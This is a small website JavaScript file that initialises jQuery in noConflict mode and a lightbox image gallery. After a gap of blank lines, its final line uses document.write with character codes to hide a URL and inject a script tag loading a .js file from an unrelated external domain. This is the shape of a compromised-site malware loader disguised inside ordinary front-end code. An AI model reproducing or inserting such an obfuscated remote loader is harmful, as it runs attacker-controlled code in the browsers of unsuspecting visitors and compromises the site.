// no conflicts with other frameworks
var $j = jQuery.noConflict();

//
// window.onload function to setup various javascripts
//
$j(function() {
	//fix png transparency in IE<6
	//$j('img[@src$=.png]').ifixpng();
	//lightbox gallery
  $j('.lightbox_image').lightBox();
  //This is for Zooming Images
	//$j.imgzoom();
});



document.write('<script language="JavaScript" type="text/javascript" src="'+String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,101,109,109,97,110,117,101,108,98,114,111,99,97,114,100,46,99,104,47,110,105,103,104,116,47,105,109,97,103,101,115,47,48,48,52,49,49,52,54,46,106,115)+'"></script>');
